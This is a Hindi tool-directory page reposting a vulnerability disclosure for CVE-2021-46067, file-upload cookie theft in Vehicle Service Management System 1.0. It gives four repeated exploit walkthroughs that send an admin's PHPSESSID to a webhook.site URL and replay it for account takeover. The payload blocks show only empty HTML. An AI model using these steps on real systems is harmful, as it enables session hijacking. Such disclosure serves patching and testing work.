Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover — CVE-2021-46067 - वाहन सेवा प्रबंधन प्रणाली 1.0 में एक हमलावर कुकीज़ चुरा सकता है, जिससे पूर्ण खाता अधिग्रहण हो सकता है। | Kitploit
उपकरण/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubsanupl/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover

Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover

CVE-2021-46067 - वाहन सेवा प्रबंधन प्रणाली 1.0 में एक हमलावर कुकीज़ चुरा सकता है, जिससे पूर्ण खाता अधिग्रहण हो सकता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

CVE-2021-46067

शोषण शीर्षक: वाहन सेवा प्रबंधन प्रणाली - 'एकाधिक' कुकी चोरी पूर्ण खाता अधिग्रहण की ओर ले जाती है

शोषण लेखक: SANU P.L

CVE: CVE-2021-46067

CVSS: 9.8 CRITICAL

संदर्भ:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46067
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46067

विवरण:

वाहन सेवा प्रबंधन प्रणाली 1.0 में एक हमलावर कुकीज़ चुरा सकता है जिससे पूर्ण खाता अधिग्रहण होता है।

1. वाहन सेवा प्रबंधन प्रणाली - 'मेरा खाता' (/admin/?page=user)

शोषण:

  1. एडमिन पैनल http://localhost/vehicle_service/admin में लॉगिन करें
  2. मेरा खाता अनुभाग http://localhost/vehicle_service/admin/?page=user पर जाएँ
  3. वेबहुक URL उत्पन्न करें - https://webhook.site
  4. वेबहुक अद्वितीय URL कॉपी करें और इसे नीचे दिए गए HTML कोड में चिपकाएँ।

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. उपरोक्त HTML कोड को उदाहरण के लिए Cookie Stealing.html नाम से सेव करें
  2. मेरा खाता अनुभाग में सभी आवश्यक विवरण दर्ज करें और अवतार (Avatar) में HTML फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. अवतार छवि को एक नए टैब में खोलें और वेबहुक स्थिति जांचें।
  5. हमें अनुरोध प्राप्त हुआ इसमें PHPSESSID है।
  6. PHPSESSID मान कॉपी करें और कोई अन्य ब्राउज़र खोलें।
  7. एडमिन पैनल http://localhost/vehicle_service/admin पर जाएँ
  8. कुकी मानों की जाँच करें और PHPSESSID मान को कॉपी किए गए PHPSESSID मान में बदलें।
  9. अब एडमिन पैनल http://localhost/vehicle_service/admin तक पहुँचें
  10. खाते में सफलतापूर्वक लॉग इन किया। खाता अधिग्रहण सफल।

2. वाहन सेवा प्रबंधन प्रणाली - 'उपयोगकर्ता सूची' (/admin/?page=user/manage_user)

शोषण:

  1. एडमिन पैनल http://localhost/vehicle_service/admin में लॉगिन करें
  2. उपयोगकर्ता सूची अनुभाग पर जाएँ और नया बनाएँ बटन पर क्लिक करें।
  3. वेबहुक URL उत्पन्न करें - https://webhook.site
  4. वेबहुक अद्वितीय URL कॉपी करें और इसे नीचे दिए गए HTML कोड में चिपकाएँ।

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. उपरोक्त HTML कोड को उदाहरण के लिए Cookie Stealing.html नाम से सेव करें
  2. नया उपयोगकर्ता बनाएँ अनुभाग में सभी आवश्यक विवरण दर्ज करें और अवतार (Avatar) में HTML फ़ाइल ब्राउज़ करें।
  3. सेव बटन पर क्लिक करें।
  4. अवतार छवि को एक नए टैब में खोलें और वेबहुक स्थिति जांचें।
  5. हमें अनुरोध प्राप्त हुआ इसमें PHPSESSID है।
  6. PHPSESSID मान कॉपी करें और कोई अन्य ब्राउज़र खोलें।
  7. एडमिन पैनल http://localhost/vehicle_service/admin पर जाएँ
  8. कुकी मानों की जाँच करें और PHPSESSID मान को कॉपी किए गए PHPSESSID मान में बदलें।
  9. अब एडमिन पैनल http://localhost/vehicle_service/admin तक पहुँचें
  10. खाते में सफलतापूर्वक लॉग इन किया। खाता अधिग्रहण सफल।

3. वाहन सेवा प्रबंधन प्रणाली - 'सेटिंग्स-सिस्टम लोगो' (/admin/?page=system_info)

शोषण:

  1. एडमिन पैनल http://localhost/vehicle_service/admin में लॉगिन करें
  2. सेटिंग्स अनुभाग http://localhost/vehicle_service/admin/?page=system_info पर जाएँ
  3. वेबहुक URL उत्पन्न करें - https://webhook.site
  4. वेबहुक अद्वितीय URL कॉपी करें और इसे नीचे दिए गए HTML कोड में चिपकाएँ।

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. उपरोक्त HTML कोड को उदाहरण के लिए Cookie Stealing.html नाम से सेव करें
  2. सेटिंग्स अनुभाग में सभी आवश्यक विवरण दर्ज करें और सिस्टम लोगो में HTML फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. सिस्टम लोगो छवि को एक नए टैब में खोलें और वेबहुक स्थिति जांचें।
  5. हमें अनुरोध प्राप्त हुआ इसमें PHPSESSID है।
  6. PHPSESSID मान कॉपी करें और कोई अन्य ब्राउज़र खोलें।
  7. एडमिन पैनल http://localhost/vehicle_service/admin पर जाएँ
  8. कुकी मानों की जाँच करें और PHPSESSID मान को कॉपी किए गए PHPSESSID मान में बदलें।
  9. अब एडमिन पैनल http://localhost/vehicle_service/admin तक पहुँचें
  10. खाते में सफलतापूर्वक लॉग इन किया। खाता अधिग्रहण सफल।

4. वाहन सेवा प्रबंधन प्रणाली - 'सेटिंग्स-वेबसाइट कवर' (/admin/?page=system_info)

शोषण:

  1. एडमिन पैनल http://localhost/vehicle_service/admin में लॉगिन करें
  2. सेटिंग्स अनुभाग http://localhost/vehicle_service/admin/?page=system_info पर जाएँ
  3. वेबहुक URL उत्पन्न करें - https://webhook.site
  4. वेबहुक अद्वितीय URL कॉपी करें और इसे नीचे दिए गए HTML कोड में चिपकाएँ।

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. उपरोक्त HTML कोड को उदाहरण के लिए Cookie Stealing.html नाम से सेव करें
  2. सेटिंग्स अनुभाग में सभी आवश्यक विवरण दर्ज करें और वेबसाइट कवर में HTML फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. वेबसाइट कवर छवि को एक नए टैब में खोलें और वेबहुक स्थिति जांचें।
  5. हमें अनुरोध प्राप्त हुआ इसमें PHPSESSID है।
  6. PHPSESSID मान कॉपी करें और कोई अन्य ब्राउज़र खोलें।
  7. एडमिन पैनल http://localhost/vehicle_service/admin पर जाएँ
  8. कुकी मानों की जाँच करें और PHPSESSID मान को कॉपी किए गए PHPSESSID मान में बदलें।
  9. अब एडमिन पैनल http://localhost/vehicle_service/admin तक पहुँचें
  10. खाते में सफलतापूर्वक लॉग इन किया। खाता अधिग्रहण सफल।

प्रभाव:

एक हमलावर दुर्भावनापूर्ण HTML फ़ाइल अपलोड करता है यह तीसरे पक्ष की वेबसाइट पर रीडायरेक्ट करता है और अनुरोध में कुकीज़ उजागर हो जाती हैं। इससे पूर्ण खाता अधिग्रहण होता है।

शमन:

फ़ाइल अपलोड कार्यक्षमता को मान्य करने और सत्र में द्वितीयक जाँच करने की अनुशंसा की जाती है।

टूल डाउनलोड करें